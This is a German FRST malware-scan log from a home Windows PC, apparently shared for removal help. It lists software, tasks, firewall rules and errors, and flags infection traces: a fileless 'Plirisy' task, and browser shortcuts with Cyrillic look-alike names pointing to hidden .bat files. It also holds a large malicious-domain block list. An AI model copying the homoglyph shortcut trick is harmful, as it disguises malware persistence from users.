Mozilla Firefox 53.0 (x86 de) (HKLM-x32\...\Mozilla Firefox 53.0 (x86 de)) (Version: 53.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0 - Mozilla)
Mp3tag v2.75 (HKLM-x32\...\Mp3tag) (Version: v2.75 - Florian Heidenreich)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MyPhoneExplorer (HKLM-x32\...\MPE) (Version: 1.8.6 - F.J. Wechselberger)
Nero 10 Movie ThemePack 1 (HKLM-x32\...\{43FBAB46-5969-4200-9958-1FF81FEE506F}) (Version: 10.2.10000.11.0 - Nero AG)
Nero BurnRights 10 (HKLM-x32\...\{943CFD7D-5336-47AF-9418-E02473A5A517}) (Version: 4.2.10500.1.102 - Nero AG)
Nero CoverDesigner 10 (HKLM-x32\...\{FCF00A6E-FB58-477A-ABE9-232907105521}) (Version: 5.2.11400.11.100 - Nero AG)
Nero DiscSpeed 10 (HKLM-x32\...\{34490F4E-48D0-492E-8249-B48BECF0537C}) (Version: 6.2.10500.2.100 - Nero AG)
Nero Express 10 (HKLM-x32\...\{70550193-1C22-445C-8FA4-564E155DB1A7}) (Version: 10.2.11900.20.100 - Nero AG)
Nero InfoTool 10 (HKLM-x32\...\{F412B4AF-388C-4FF5-9B2F-33DB1C536953}) (Version: 7.2.10400.5.100 - Nero AG)
Nero MediaHub 10 (HKLM-x32\...\{1F7FB68F-52F6-46A3-B42F-38CE46295AE5}) (Version: 1.2.13200.33.100 - Nero AG)
Nero Multimedia Suite 10 Essentials (HKLM-x32\...\{ADEF1F0B-635E-4041-B50F-A510C1B4D2C5}) (Version: 10.5.10400 - Nero AG)
Nero RescueAgent 10 (HKLM-x32\...\{E337E787-CF61-4B7B-B84F-509202A54023}) (Version: 3.2.10800.9.100 - Nero AG)
Nero StartSmart 10 (HKLM-x32\...\{F61D489E-6C44-49AC-AD02-7DA8ACA73A65}) (Version: 10.2.11600.14.100 - Nero AG)
Nero Update (HKLM-x32\...\{65BB0407-4CC8-4DC7-952E-3EEFDF05602A}) (Version: 1.0.0018 - Nero AG)
NVIDIA 3D Vision Treiber 361.91 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 361.91 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.9.1.22 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.9.1.22 - NVIDIA Corporation)
NVIDIA Grafiktreiber 361.91 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 361.91 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Paint.NET v3.5.10 (HKLM\...\{529125EF-E3AC-4B74-97E6-F688A7C0F1C0}) (Version: 3.60.0 - dotPDN LLC)
PDF Architect (HKLM-x32\...\{064A929A-4DE8-40CF-A901-BD40C14E4D25}) (Version: 1.1.83.9982 - pdfforge GmbH)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.7.1 - pdfforge)
Plugfree NETWORK (HKLM\...\{7BA64D21-EE46-4a9a-8145-52B0175C3F86}) (Version: 6.2.0.1 - FUJITSU LIMITED)
Plugfree NETWORK (Version: 6.2.001 - FUJITSU LIMITED) Hidden
Power Saving Utility (HKLM-x32\...\{49A588CF-5FD4-4774-BFBF-0764287DE82B}) (Version: 32.01.10.038 - FUJITSU LIMITED)
QuickSteuer Deluxe 2016 (HKLM-x32\...\{3077FB33-83B4-4B16-9A35-CD160CD3D012}) (Version: 21.33.90 - Haufe-Lexware GmbH & Co.KG)
QuickSteuer Deluxe 2017 (HKLM-x32\...\{BC0423F1-44FC-43B2-BC77-ED912E75D64F}) (Version: 22.30.70 - Haufe-Lexware GmbH & Co.KG)
Raccolta foto di Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6526 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7601.30129 - Realtek Semiconductor Corp.)
RedMon - Redirection Port Monitor (HKLM\...\Redirection Port Monitor) (Version:  - )
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
SHIELD Streaming (Version: 4.1.0260 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.9.1.22 - NVIDIA Corporation) Hidden
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype™ 7.30 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.30.105 - Skype Technologies S.A.)
Smart Cutter (HKLM-x32\...\{828FFE22-A27D-4891-BF79-CE78C9E1F478}) (Version: 1.8.1 - FameRing)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.19.1 - Synaptics Incorporated)
tiptoi® Manager 3.0.9 (HKLM-x32\...\9978-5763-2995-5228) (Version: 3.0.9 - Ravensburger AG)
WIDCOMM Bluetooth Software (HKLM\...\{6E7F4CA3-B2DE-413C-A7A1-43AA5BE19EA1}) (Version: 6.5.0.3100 - Broadcom Corporation)
Windows Installer Clean Up (HKLM-x32\...\{121634B0-2F4B-11D3-ADA3-00C04F52DD52}) (Version: 3.00.00.0000 - Microsoft Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh - ActiveX-besturingselement voor externe verbindingen (HKLM-x32\...\{C32CE55C-12BA-4951-8797-0967FDEF556F}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Mesh ActiveX control for remote connections (HKLM-x32\...\{C5398A89-516C-4DAF-BA07-EE7949090E56}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{C63A1E60-B6A4-440B-89A5-1FC6E4AC1C94}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {09684BE9-6801-4ACC-A441-372E5344685D} - System32\Tasks\{FD46ED85-54A0-43DF-9695-7871B128BD8A} => pcalua.exe -a C:\Users\Markus\Downloads\msicuu2.exe -d C:\Users\Markus\Downloads
Task: {235BC95F-90C6-4A38-A70A-AE3C9F5D5481} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe 
Task: {63450DF1-2C0B-428E-BFAC-EC1022663B86} - System32\Tasks\HPLJCustParticipation => C:\Program Files (x86)\HP\HPLJUT\HPLJUTSCH.exe [2012-06-14] (Hewlett Packard)
Task: {9E499590-0B71-46E5-A0D1-7999EF821021} - System32\Tasks\Fujitsu\DeskUpdate => c:\Fujitsu\Programs\DeskUpdate\ducmd.exe [2015-06-15] (Fujitsu Technology Solutions)
Task: {AF87EE5A-0FFE-4949-B2EC-5914C44C1F2C} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe 
Task: {B28FBEA4-57C7-46AC-99F4-93A8B224A578} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe 
Task: {B63B338D-2191-45D3-814B-CD40E4AF8882} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe 
Task: {B6CEEF38-5E00-4EAF-B77C-A1ABBD8D451B} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe 
Task: {BD8FF9A2-1BE8-4462-B889-1D0245A1B4C5} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated)
Task: {BE571A95-F9AD-46C2-93D0-C2AE61480FCE} - \Plirisy -> Keine Datei <==== ACHTUNG
Task: {C5AA2588-EC43-4B8A-B1E4-C59182E532A7} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-13] (Adobe Systems Incorporated)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Intеrnеt Ехplorеr (Nо Add-оns).lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gооgle Сhrоmе.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.emorhc.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Lаunсh Intеrnet Ехрlоrеr Вrowser.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnet Explorеr.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnet Eхplorеr (3).lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnеt Еxрlorеr (2).lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Моzilla Firefоx.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.xoferif.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Public\Desktop\ZооmВrоwsеr EХ.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.resworbmooz.bat (Keine Datei) <===== Cyrillic

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2013-10-27 09:03 - 2016-02-09 10:39 - 00020536 _____ () C:\Program Files\NVIDIA Corporation\CoProcManager\detoured.dll
2012-11-07 06:17 - 2016-02-09 07:41 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2013-03-27 22:39 - 2010-06-17 21:56 - 00087040 _____ () C:\Windows\System32\redmonnt.dll
2008-10-24 17:35 - 2008-10-24 17:35 - 00128296 _____ () C:\Program Files (x86)\Lexware\AAVUpdateManager\aavus.exe
2013-09-05 01:17 - 2013-09-05 01:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2013-11-06 12:58 - 2013-11-06 12:58 - 02048000 _____ () C:\Program Files\Avira Secure Backup\ShellExtensionx64\ShellExtension.dll
2013-11-06 16:52 - 2013-11-06 16:52 - 02258000 _____ () C:\Program Files\Avira Secure Backup\Avira Secure BackupCrawler.exe
2016-02-15 19:01 - 2016-01-12 06:43 - 00291264 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2012-01-25 05:00 - 2011-12-15 15:34 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2017-05-22 17:34 - 2017-05-09 16:38 - 02270672 _____ () C:\PROGRAM FILES\MALWAREBYTES\MwacLib.dll
2015-06-22 19:41 - 2016-01-12 06:43 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2013-10-27 09:03 - 2016-02-09 10:39 - 00020536 _____ () C:\Program Files (x86)\NVIDIA Corporation\CoProcManager\detoured.dll
2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2013-11-06 12:59 - 2013-11-06 12:59 - 01633280 _____ () C:\Program Files\Avira Secure Backup\ShellExtension\ShellExtension.dll
2017-05-22 20:55 - 2017-05-22 20:55 - 00011264 _____ () C:\Users\Markus\AppData\Local\Temp\nsv6EBB.tmp\System.dll
2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf
2015-11-11 03:42 - 2015-11-11 03:42 - 01045672 _____ () C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\UmOutlookAddin.dll
2012-02-25 02:37 - 2011-12-16 03:39 - 01198872 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com

Da befinden sich 7934 mehr Seiten.

IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\0scan.com -> www.0scan.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\123simsen.com -> www.123simsen.com

Da befinden sich 7934 mehr Seiten.


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2017-05-05 18:51 - 00000853 _____ C:\Windows\system32\Drivers\etc\hosts


0.0.0.1	mssplus.mcafee.com

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-3526156030-524322557-4044303751-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Markus\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.179.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{05211D32-AF63-4CB0-A6B7-B09C94D0B99B}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{71D985ED-FDF0-42DE-9FC4-7C21A11D9FA0}] => (Allow) LPort=2869
FirewallRules: [{E65EEBEE-05F0-4C72-A9EE-0AA508672421}] => (Allow) LPort=1900
FirewallRules: [{9AA5011A-0FCC-4D9D-8784-BD7401D7A24A}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{EE66A64E-5B37-4916-9CC4-D4FBBB548A42}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{3C0F122C-0742-46E8-AC7F-1C1E9EEBC53E}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{FE0D6C86-8FFE-4877-8D0D-B0F7F5B00E9B}C:\program files (x86)\lexware\quicksteuer deluxe\2013\steuer.exe] => (Allow) C:\program files (x86)\lexware\quicksteuer deluxe\2013\steuer.exe
FirewallRules: [UDP Query User{0BA32332-6631-4B2C-B5B3-F4555E347C79}C:\program files (x86)\lexware\quicksteuer deluxe\2013\steuer.exe] => (Allow) C:\program files (x86)\lexware\quicksteuer deluxe\2013\steuer.exe
FirewallRules: [TCP Query User{1D9F0CA1-AB5A-4249-8524-86D12D4C7170}C:\program files (x86)\spyware terminator\spywareterminatorupdate.exe] => (Block) C:\program files (x86)\spyware terminator\spywareterminatorupdate.exe
FirewallRules: [UDP Query User{CFD99534-FA56-4434-8213-7F76D477B272}C:\program files (x86)\spyware terminator\spywareterminatorupdate.exe] => (Block) C:\program files (x86)\spyware terminator\spywareterminatorupdate.exe
FirewallRules: [{480E6B07-798E-4A2D-81A6-F92F0CB9EE60}] => (Allow) C:\Program Files (x86)\Lexware\Update Service\Hmg.InstallationService.Service.exe
FirewallRules: [{2A3583E9-7472-4D17-A5D4-47875FB42265}] => (Allow) C:\Program Files (x86)\Lexware\Update Service\Hmg.InstallationService.Service.exe
FirewallRules: [{C41C6DD4-CFFF-4655-874D-5CE44166C462}] => (Allow) C:\Program Files (x86)\HP\HP LaserJet 200 color MFP M276\bin\FaxApplications.exe
FirewallRules: [{CE06C567-97E9-467D-80F3-09CC2E7B28DE}] => (Allow) C:\Program Files (x86)\HP\HP LaserJet 200 color MFP M276\bin\DigitalWizards.exe
FirewallRules: [{5F4AD41E-6132-4D82-86A4-473BA3D09A0D}] => (Allow) C:\Program Files (x86)\HP\HP LaserJet 200 color MFP M276\Bin\HPNetworkCommunicator.exe
FirewallRules: [{2702B751-16F9-48CD-9E49-A21421E09842}] => (Allow) C:\Program Files (x86)\HP\HP LaserJet 200 color MFP M276\bin\EWSProxy.exe
FirewallRules: [{3EB39716-41BA-45F6-AE81-D61AA6F58713}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{67109041-ED86-4F91-8309-D8BD9F30FA0D}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{7500E678-5CB9-4385-8912-54B1C9347BE5}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{CEDAF5DD-17C1-4B9F-89B2-88A0383795AE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{2E65A8BF-A7AF-4F73-8D0A-3E85DAFED6C9}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{83D8589A-4A65-4922-BDEA-1DA480FB8729}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{E6FBF0C0-7479-404F-ABB6-8EDD2183B6BE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{BED2074E-60D7-4BB9-B15E-E4FFED41D21D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A59E9212-F88E-4BFF-ABE9-AE66ECBF2286}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{6CCE5B8D-1C91-4A2C-88ED-15572F05F895}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{E675A3F9-E1A9-42E5-A350-CF44D1BC3BA8}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{64AF72C0-C954-42A9-AD2D-0D552A3F2C5D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{87A2FE0E-AB34-4C95-B10C-5D9081F3F38B}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe

==================== Wiederherstellungspunkte =========================


==================== Fehlerhafte Geräte im Gerätemanager =============

Name: Bluetooth-Peripheriegerät
Description: Bluetooth-Peripheriegerät
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Bluetooth-Peripheriegerät
Description: Bluetooth-Peripheriegerät
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft-Teredo-Tunneling-Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: Bluetooth-Peripheriegerät
Description: Bluetooth-Peripheriegerät
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (05/22/2017 08:54:02 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (05/22/2017 08:38:06 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (05/22/2017 05:41:17 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (05/22/2017 05:28:26 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (05/22/2017 03:14:58 AM) (Source: System Restore) (EventID: 8193) (User: )
Description: Fehler beim Erstellen des Wiederherstellungspunkts (Prozess = C:\Windows\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation; Beschreibung = Geplanter Prüfpunkt; Fehler = 0x80070422).

Error: (05/21/2017 08:39:32 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Fehler beim Erstellen des Wiederherstellungspunkts (Prozess = C:\Windows\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation; Beschreibung = Geplanter Prüfpunkt; Fehler = 0x80070422).

Error: (05/21/2017 07:47:00 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (05/21/2017 07:02:08 PM) (Source: System Restore) (EventID: 8193) (User: )
